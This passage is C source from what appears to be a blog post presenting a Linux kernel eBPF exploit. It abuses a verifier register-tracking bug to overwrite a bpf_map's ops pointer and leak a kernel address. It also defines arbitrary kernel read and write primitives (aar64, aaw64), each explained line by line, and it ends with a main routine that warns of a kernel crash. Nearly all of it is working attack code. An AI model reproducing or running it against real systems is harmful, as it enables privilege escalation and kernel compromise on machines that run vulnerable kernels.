  // delivers a packet and runs the program in-kernel.
  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  // The fake ops pointer is shifted back by update_elem's slot index so that
  // the slot ends up pointing at the gadget at OPS_CONTAINING_RET_OFFSET.
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) & 0xffff;
  printf("ops_containing_ret_offset: 0x%x\n", ops_containing_ret_offset);
  *(uint16_t*)(&buf[0xf0]) = ops_containing_ret_offset;
  // Sending the packet triggers the filter, which performs the OOB write.
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

// fd of the sprayed map whose ops pointer got clobbered (0 if none found).
int corrupted_map_fd;
// Kernel pointer leaked through the corrupted map — per the function name,
// presumably a bpf_map-related address; exact meaning TODO confirm.
uint64_t jit_addr;
// Scan the sprayed maps for the one whose ops pointer was corrupted by
// make_corrupted_map(), and leak a kernel pointer through it.
//
// For each candidate, a BPF program calls map_update_elem() on it and
// stores the helper's return value into mapfd's element. On an intact map
// that return value is 0; on the corrupted map the shifted ops table makes
// the kernel run a different function whose return value is a kernel
// pointer. Reading mapfd[0] back from userspace distinguishes the two.
//
// On success sets corrupted_map_fd and jit_addr; otherwise leaves
// corrupted_map_fd == 0 (the caller checks for that).
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (size_t i = 0; i < sizeof(map_spray_fd) / sizeof(map_spray_fd[0]); ++i) {
    int cur_map_fd = map_spray_fd[i];
    // Skip the map we read results from.
    if (cur_map_fd == mapfd) {
      continue;
    }

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        // Stash the helper's return value; it is the leak on the corrupted map.
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    // Any packet triggers the filter.
    write(socks[1], "Hello", 5);

    // Initialize so a failed lookup cannot leave `val` holding stack garbage
    // (the original read it uninitialized on lookup failure — UB).
    uint64_t val = 0;
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

// Arbitrary 8-byte kernel write: *(uint64_t *)addr = val.
//
// Reuses the verifier value-tracking bug: the program makes the verifier
// believe the skb_load_bytes() length is 1 while it is 0x10 at runtime,
// so 16 packet bytes land on the BPF stack. Bytes 8..15 (the target
// address) end up at fp-0x18, which a second skb_load_bytes() then uses
// as the destination pointer for the next 8 packet bytes (the value).
//
// Returns buf[0], which is never modified — always the marker constant
// 0xdeadbeefcafebebe; the return value carries no information.
uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  // The element must hold 1 for the mask dance below.
  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // Verifier thinks r8 == 0, runtime value is 1.
      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      // Runtime effect: fp-0x20 = buf[0] (marker), fp-0x18 = buf[1] == addr.
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // Second load writes buf[2] (val) directly to *addr.
      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet layout: [marker][target address][value to write].
  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
// Arbitrary 8-byte kernel read: returns *(uint64_t *)addr.
//
// Same verifier trick as aaw64(): skb_load_bytes() writes 0x10 packet
// bytes onto the BPF stack although the verifier believes the length is
// 1, placing the target address at fp-0x18. That pointer is then passed
// as the value argument to map_update_elem(), which copies 8 bytes from
// *addr into mapfd's element; userspace reads the element back.
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  // The element must hold 1 for the mask dance below.
  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // Verifier thinks r8 == 0, runtime value is 1.
      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = r6 == map_elem — presumably
                           // just to give fp-0x18 a verifier-visible
                           // pointer type; the runtime value is overwritten
                           // by the skb_load_bytes below (TODO confirm)
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      // Runtime effect: fp-0x20 = buf[0] (marker), fp-0x18 = buf[1] == addr.
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // map_update_elem copies 8 bytes from *arg3 (== addr) into the element.
      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  // Packet layout: [marker][address to read]; then fetch the copied value.
  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

/*
 * Entry point: corrupt one sprayed bpf_map's ops pointer, locate the
 * corrupted map, and report the leaked kernel pointer. The arbitrary
 * read/write primitives (aar64/aaw64) are defined above but not invoked
 * here.
 *
 * Returns 0 on success, -1 if no corrupted map was found.
 */
int main() {
  // Removed: unused 64KB `verifier_log` stack buffer and a pointless
  // srand(time(NULL)) — rand() is never called in this program.
  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] jit_addr: 0x%016lx\n", jit_addr);

  get_enter_to_continue("Press enter to exit(cause kernel crash)...");

  return 0;
}

Reference

Read more →